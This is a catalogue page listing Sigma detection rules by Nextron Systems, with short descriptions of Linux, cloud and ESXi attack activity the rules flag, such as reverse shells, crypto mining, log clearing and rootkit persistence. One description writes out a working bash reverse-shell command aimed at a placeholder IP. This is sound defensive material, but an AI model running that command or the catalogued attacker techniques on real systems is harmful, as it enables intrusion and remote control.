Sigma Rules
1,405 rules found for "Nextron Systems"
Antivirus Exploitation Framework Detection
Detects a highly relevant Antivirus alert that reports an exploitation framework. This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.
Antivirus Hacktool Detection
Detects a highly relevant Antivirus alert that reports a hack tool or other attack tool. This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.
Antivirus Password Dumper Detection
Detects a highly relevant Antivirus alert that reports a password dumper. This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.
Antivirus Ransomware Detection
Detects a highly relevant Antivirus alert that reports ransomware. This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.
Antivirus Relevant File Paths Alerts
Detects an Antivirus alert in a highly relevant file path or with a relevant file name. This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.
Antivirus Web Shell Detection
Detects a highly relevant Antivirus alert that reports a web shell. It's highly recommended to tune this rule to the specific strings used by your anti virus solution by downloading a big WebShell repository from e.g. github and checking the matches. This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.
AWS Bucket Deleted
Detects the deletion of S3 buckets in AWS CloudTrail logs. Monitoring the deletion of S3 buckets is critical for security and data integrity, as it may indicate potential data loss or unauthorized access attempts.
AWS ConsoleLogin Failed Authentication
Detects failed AWS console login attempts due to authentication failures. Monitoring these events is crucial for identifying potential brute-force attacks or unauthorized access attempts to AWS accounts.
PUA - AWS TruffleHog Execution
Detects the execution of TruffleHog, a popular open-source tool used for scanning repositories for secrets and sensitive information, within an AWS environment. It has been reported to be used by threat actors for credential harvesting. All detections should be investigated to determine if the usage is authorized by security teams or potentially malicious.
New Okta User Created
Detects new user account creation
Possible Coin Miner CPU Priority Param
Detects command line parameter very often used with coin miners
Suspicious Commands Linux
Detects relevant commands often related to malware or hacking activity
Program Executions in Suspicious Folders
Detects program executions in suspicious non-program folders related to malware or hacking activity
Relevant ClamAV Message
Detects relevant ClamAV messages
Guacamole Two Users Sharing Session Anomaly
Detects suspicious session with two users present
Equation Group Indicators
Detects suspicious shell commands used in various Equation Group scripts and tools
Buffer Overflow Attempts
Detects buffer overflow attempts in Unix system log files
Commands to Clear or Remove the Syslog - Builtin
Detects specific commands commonly used to remove or empty the syslog
Code Injection by ld.so Preload
Detects the ld.so preload persistence file. See `man ld.so` for more information.
Potential Suspicious BPF Activity - Linux
Detects the presence of "bpf_probe_write_user" BPF helper-generated warning messages. Which could be a sign of suspicious eBPF activity on the system.
Shellshock Expression
Detects shellshock expressions in log files
Suspicious Activity in Shell Commands
Detects suspicious shell commands used in various exploit codes (see references)
Suspicious Log Entries
Detects suspicious log entries in Linux log files
Suspicious Reverse Shell Command Line
Detects suspicious shell commands or program code that may be executed or used in command line to establish a reverse shell
JexBoss Command Sequence
Detects suspicious command sequence that JexBoss
Symlink Etc Passwd
Detects suspicious command lines that look as if they would create symbolic links to /etc/passwd
Suspicious OpenSSH Daemon Error
Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts
Suspicious Named Error
Detects suspicious DNS error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts
Suspicious VSFTPD Error Messages
Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts
Persistence Via Sudoers Files
Detects creation of sudoers file or files in "sudoers.d" directory which can be used a potential method to persiste privileges for a specific user.
Triple Cross eBPF Rootkit Default LockFile
Detects the creation of the file "rootlog" which is used by the TripleCross rootkit as a way to check if the backdoor is already running.
Triple Cross eBPF Rootkit Default Persistence
Detects the creation of "ebpfbackdoor" files in both "cron.d" and "sudoers.d" directories. Which both are related to the TripleCross persistence method
Linux Reverse Shell Indicator
Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')
Linux Crypto Mining Pool Connections
Detects process connections to a Monero crypto mining pool
Communication To Ngrok Tunneling Service - Linux
Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors
Shell Invocation via Apt - Linux
Detects the use of the "apt" and "apt-get" commands to execute a shell or proxy commands. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
Linux Base64 Encoded Shebang In CLI
Detects the presence of a base64 version of the shebang in the commandline, which could indicate a malicious payload about to be decoded
Enable BPF Kprobes Tracing
Detects common command used to enable bpf kprobes tracing
Capabilities Discovery - Linux
Detects usage of "getcap" binary. This is often used during recon activity to determine potential binaries that can be abused as GTFOBins or other.
Remove Immutable File Attribute
Detects usage of the 'chattr' utility to remove immutable file attribute.
Linux Sudo Chroot Execution
Detects the execution of 'sudo' command with '--chroot' option, which is used to change the root directory for command execution. Attackers may use this technique to evade detection and execute commands in a modified environment. This can be part of a privilege escalation strategy, as it allows the execution of commands with elevated privileges in a controlled environment as seen in CVE-2025-32463. While investigating, look out for unusual or unexpected use of 'sudo --chroot' in conjunction with other commands or scripts such as execution from temporary directories or unusual user accounts.
Syslog Clearing or Removal Via System Utilities
Detects specific commands commonly used to remove or empty the syslog. Which is a technique often used by attacker as a method to hide their tracks
Remove Scheduled Cron Task/Job
Detects usage of the 'crontab' utility to remove the current crontab. This is a common occurrence where cryptocurrency miners compete against each other by removing traces of other miners to hijack the maximum amount of resources possible
Linux Crypto Mining Indicators
Detects command line parameters or strings often used by crypto miners
Curl Usage on Linux
Detects a curl process start on linux, which indicates a file download from a remote location or a simple web request to a remote server
ESXi Admin Permission Assigned To Account Via ESXCLI
Detects execution of the "esxcli" command with the "system" and "permission" flags in order to assign admin permissions to an account.
ESXi Storage Information Discovery Via ESXCLI
Detects execution of the "esxcli" command with the "storage" flag in order to retrieve information about the storage status and other related information. Seen used by malware such as DarkSide and LockBit.
ESXi VM Kill Via ESXCLI
Detects execution of the "esxcli" command with the "vm" and "kill" flag in order to kill/shutdown a specific VM.